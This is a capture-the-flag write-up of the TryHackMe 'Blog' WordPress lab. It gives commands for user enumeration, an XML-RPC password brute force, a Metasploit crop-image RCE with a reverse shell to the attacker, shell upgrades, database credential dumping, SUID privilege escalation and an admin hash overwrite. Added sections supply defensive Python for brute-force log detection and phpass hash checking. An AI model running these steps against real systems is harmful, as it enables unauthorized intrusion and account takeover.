
TryHackMe Blog Writeup

https://tryhackme.com/r/room/blog

Discover the foundational aspects of cybersecurity with the Blog Capture The Flag (CTF) challenge, a medium-level exercise. This concise write-up provides clear insights into essential WordPress concepts, presented with simplicity and clarity.

Add Hosts

Edit the /etc/hosts file and add the following entry:

10.10.100.29 blog.thm

Script to add the host entry automatically (idempotent: it only appends if the line is not already present):

ip="10.10.100.29";domain="blog.thm"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Gather Information From WordPress

wpscan -e u --url "http://blog.thm/"
  • -e = enumerate
  • u = usernames

result

  • users = bjoel,kwheel
  • theme = twentytwenty

BruteForce WordPress

wpscan --url "http://blog.thm/" --usernames bjoel,kwheel --passwords /usr/share/dict/rockyou.txt --password-attack xmlrpc --threads 20

result

  • kwheel:cutiepie1
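Seen from the server side, the XML-RPC password attack above is a burst of POST requests to /xmlrpc.php from one client. As an added example (not part of the original writeup), here is a small Python detector that parses access-log lines in the common combined format and flags any source IP that sends more than a threshold of such POSTs inside a sliding time window. The log lines, IP addresses, timestamps and thresholds are all constructed for illustration. One caveat for tuning: a single XML-RPC request can carry many login attempts via system.multicall, so a low request count is still significant, and disabling or restricting xmlrpc.php is the usual mitigation.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Combined log format: client IP, identd, user, [timestamp], "METHOD path proto", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample log (not captured from the room): one noisy client, one quiet one,
# one that only touches other endpoints, and a malformed line the parser must skip.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2024:12:00:01 +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "-"
10.0.0.5 - - [10/Mar/2024:12:00:02 +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "-"
10.0.0.5 - - [10/Mar/2024:12:00:03 +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "-"
10.0.0.5 - - [10/Mar/2024:12:00:04 +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "-"
10.0.0.5 - - [10/Mar/2024:12:00:05 +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "-"
10.0.0.5 - - [10/Mar/2024:12:00:06 +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "-"
10.0.0.7 - - [10/Mar/2024:12:05:00 +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "-"
10.0.0.7 - - [10/Mar/2024:12:05:30 +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "-"
10.0.0.9 - - [10/Mar/2024:12:06:00 +0000] "GET /xmlrpc.php HTTP/1.1" 405 42 "-" "-"
10.0.0.9 - - [10/Mar/2024:12:06:10 +0000] "POST /wp-login.php HTTP/1.1" 200 5120 "-" "-"
this line is not a valid log record
"""


def parse_line(line):
    """Return a dict with ip, ts (aware datetime), method, path, status; None if unparseable."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": m["path"].split("?", 1)[0],  # drop any query string
        "status": int(m["status"]),
    }


def find_xmlrpc_bruteforce(lines, threshold=5, window_seconds=60):
    """Map source IP -> max number of POST /xmlrpc.php requests seen within any window."""
    hits = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path"] == "/xmlrpc.php":
            hits[rec["ip"]].append(rec["ts"])

    window = timedelta(seconds=window_seconds)
    flagged = {}
    for ip, times in hits.items():
        times.sort()
        start, best = 0, 0
        for end in range(len(times)):  # two-pointer sliding window over sorted timestamps
            while times[end] - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[ip] = best
    return flagged


if __name__ == "__main__":
    for ip, n in find_xmlrpc_bruteforce(SAMPLE_LOG.splitlines()).items():
        print(f"ALERT {ip}: {n} POST /xmlrpc.php requests within 60 s")
```

Feed it real lines with `find_xmlrpc_bruteforce(open("access.log").readlines())`; lower `threshold` if you also count multicall batches, and extend the path check to /wp-login.php to catch the non-XML-RPC variant of the same attack.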

Exploit to Gain Access

msfconsole

use multi/http/wp_crop_rce
set password cutiepie1
set username kwheel
set rhosts blog.thm
set THEME_DIR twentytwenty
set lhost tun0
exploit
shell

Get an Interactive Shell: Once the reverse shell connects, convert it into an interactive shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'

Press Ctrl+Z to background the shell, then run:

stty size; stty raw -echo; fg

As the last step, set the terminal environment:

export TERM=xterm;

Extract Password Hash From MySQL

Read the database credentials from wp-config.php, then connect to MySQL with them:

cat wp-config.php

mysql -u wordpressuser -p

show databases;
use blog;
show tables;
select * from wp_users;
exit

Privilege Escalation

Find SUID binaries:

find / -type f -perm -u=s 2>/dev/null

result

  • vulnerable = /usr/sbin/checker

ltrace /usr/sbin/checker

result

  • env(admin)

This means the program reads an environment variable named admin.

Now simply run it with the admin variable set:

admin=1 /usr/sbin/checker;/usr/sbin/checker
whoami

Optional

WordPress Password Hash Generator

Generate a hash for a password; I've used password.

mysql -u wordpressuser -p

show databases;
use blog;
show tables;
select * from wp_users;
UPDATE wp_users SET user_pass = "$P$Bq7XDB8Xb/jjexb8e4CIiDw38/2HyO." WHERE user_nicename="bjoel";
select * from wp_users;
exit

Now you can log in at http://blog.thm/wp-login.php with bjoel:password.
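The $P$ prefix on the hash above marks a phpass "portable" hash, the scheme WordPress used for wp_users.user_pass: "$P$", one character encoding log2 of the MD5 round count ('B' is 2^13 = 8192 rounds), an 8-character salt, then a custom base64 encoding of the final digest. As an added example (not part of the original writeup, and not WordPress's or phpass's own code) here is a Python reimplementation that generates such a hash and, more usefully during an investigation, checks a stored hash against a candidate password, so you can confirm offline whether a dumped row still carries a known-weak value. Function names, the salt used in the test, and the sample passwords are constructed; the WRITEUP_HASH constant is the value from the post above.

```python
import hashlib
import hmac
import secrets
from typing import Optional

# phpass alphabet: its own base64 variant, not RFC 4648.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

# Hash from the writeup above (the author states it is the hash of "password").
WRITEUP_HASH = "$P$Bq7XDB8Xb/jjexb8e4CIiDw38/2HyO."


def _encode64(data: bytes, count: int) -> str:
    """phpass encode64: packs 3 bytes into 4 alphabet chars, low bits first (16 bytes -> 22 chars)."""
    out = []
    i = 0
    while i < count:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def iteration_count(setting: str) -> int:
    """Number of MD5 rounds encoded in the 4th character ('B' -> 2**13 = 8192)."""
    if setting[:3] not in ("$P$", "$H$") or len(setting) < 12:
        raise ValueError("not a phpass portable hash")
    count_log2 = ITOA64.index(setting[3])  # ValueError if the char is not in the alphabet
    if not 7 <= count_log2 <= 30:           # same bounds phpass itself enforces
        raise ValueError("iteration count out of range")
    return 1 << count_log2


def _crypt_private(password: bytes, setting: str) -> str:
    """Core phpass routine: setting = '$P$' + count char + 8-char salt (any tail is ignored)."""
    rounds = iteration_count(setting)
    salt = setting[4:12]
    digest = hashlib.md5(salt.encode("ascii") + password).digest()
    for _ in range(rounds):
        digest = hashlib.md5(digest + password).digest()
    return setting[:12] + _encode64(digest, 16)


def hash_password(password: str, salt: Optional[str] = None, count_log2: int = 13) -> str:
    """Create a new portable hash. WordPress's PasswordHash(8, true) stores 8 + 5 = 13 -> 'B'."""
    if salt is None:
        salt = "".join(secrets.choice(ITOA64) for _ in range(8))
    if len(salt) != 8 or any(c not in ITOA64 for c in salt):
        raise ValueError("salt must be 8 characters from the phpass alphabet")
    setting = "$P$" + ITOA64[count_log2] + salt
    return _crypt_private(password.encode("utf-8"), setting)


def check_password(password: str, stored_hash: str) -> bool:
    """Recompute with the stored salt and round count, then compare in constant time."""
    try:
        computed = _crypt_private(password.encode("utf-8"), stored_hash)
    except ValueError:
        return False
    return hmac.compare_digest(computed, stored_hash)


if __name__ == "__main__":
    h = hash_password("password")
    print(h, check_password("password", h), check_password("Password", h))
    print(iteration_count(WRITEUP_HASH), "rounds; writeup hash matches 'password':",
          check_password("password", WRITEUP_HASH))
```

The round count is why this format is slow to audit but not slow enough by modern standards: 8192 MD5 calls per guess is cheap on a GPU, which is the practical reason to enforce strong passwords and rate-limit login endpoints rather than rely on the hash alone.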

Finally

cat /root/root.txt
cat /media/usb/user.txt

This post is licensed under CC BY 4.0 by the author.